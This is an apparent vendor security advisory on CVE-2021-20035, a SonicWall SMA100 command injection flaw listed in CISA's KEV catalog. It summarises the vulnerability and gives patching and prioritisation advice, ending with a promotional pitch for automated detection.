What happened

CISA added CVE-2021-20035 to the Known Exploited Vulnerabilities (KEV) catalog on 2025-04-16, signaling confirmed in-the-wild exploitation of this flaw CISA KEV. The vulnerability is an OS command injection in SonicWall SMA100 appliance management, enabling arbitrary command execution by a remote authenticated attacker NVD entry. CISA’s listing specifies execution of injected commands under the non-privileged 'nobody' account and sets a federal remediation due date of 2025-05-07 CISA KEV. The weakness is categorized as CWE-78 (OS Command Injection), aligning with arbitrary command execution risks when user input reaches system shells NVD CWE-78.

CISA instructs impacted orgs to apply mitigations per vendor guidance, follow applicable BOD 22-01 directives for cloud services, or discontinue use if no mitigations exist CISA KEV. The CVE record is tracked across authoritative registries for cross-verification and SBOM mapping MITRE CVE record.

Why it matters

Inclusion in KEV means active exploitation has been observed against real targets, elevating this issue from theoretical to operational risk CISA KEV. Management-plane command injection grants post-auth code execution on a security appliance, shortening the defender’s window and complicating detection if attackers blend into legitimate admin flows NVD entry. Even when commands run as 'nobody', attackers can still stage payloads, alter configs reachable to that user context, or establish footholds consistent with OS command injection impacts CISA KEV. CWE-78 class issues are high-signal because they enable direct OS-level actions rather than data-only impacts NVD CWE-78.

For organizations with these appliances in critical paths, the KEV due date is not advisory—it’s a mandated prioritization target for federal civilian agencies and a de facto urgency marker for everyone else CISA KEV. The attack precondition of authentication does not materially reduce risk where credentials are compromised or internal admin access is exposed NVD entry.

Technical detail

CVE-2021-20035 is an OS command injection vulnerability in the SMA100 management interface, allowing a remote authenticated attacker to inject arbitrary OS commands NVD entry. The injected commands execute as the 'nobody' user, reflecting a restricted but still operational UNIX account context CISA KEV. The flaw maps to CWE-78, where insufficient neutralization of special elements in command strings leads to shell invocation with attacker-controlled input NVD CWE-78.

The exploitation sequence is straightforward for anyone with valid administrative session capability: authenticate to the management plane, supply crafted input that reaches a command execution sink, and run system-level instructions within the appliance’s OS NVD entry. While the privilege is limited to 'nobody', arbitrary command execution remains a reliable way to drop tooling or proxy traffic in line with post-auth code execution characteristics CISA KEV. The KEV inclusion establishes that adversaries have operationalized this path, which materially raises prioritization for affected environments CISA KEV.

Authoritative records for this CVE are maintained by NVD and MITRE for consistent identification and coordination across tooling, advisories, and asset inventories NVD entry, MITRE CVE record.

Defense

• Patch/mitigate now: CISA’s required action is to apply vendor mitigations, follow BOD 22-01 where applicable, or discontinue use if mitigations are unavailable CISA KEV.
• Treat the KEV due date (2025-05-07) as a hard prioritization target to reduce exposure while exploitation is active CISA KEV.
• Confirm exposure and track remediation using the canonical CVE record across inventories and scanners referencing CVE-2021-20035 and CWE-78 NVD entry, MITRE CVE record.

Given the post-auth nature of this issue, organizations should presume credential theft or misuse is a viable pathway whenever exploitation is seen in the wild CISA KEV. Prioritize rapid mitigation over lengthy forensics when devices remain exposed NVD entry.

Lyrie Verdict

CVE-2021-20035 is a management-plane, post-auth OS command injection with confirmed exploitation, making human-in-the-loop response too slow for early containment CISA KEV. Lyrie’s position is simple: detect and interdict command-execution patterns at machine speed the moment the management interface begins spawning OS processes—especially under the 'nobody' account context tied to this CVE NVD entry, CISA KEV. Autonomous correlation between authenticated admin sessions and emergent process activity is the decisive edge against both human operators and AI-augmented intrusion tooling that can iterate payloads faster than analysts can pivot MITRE CVE record.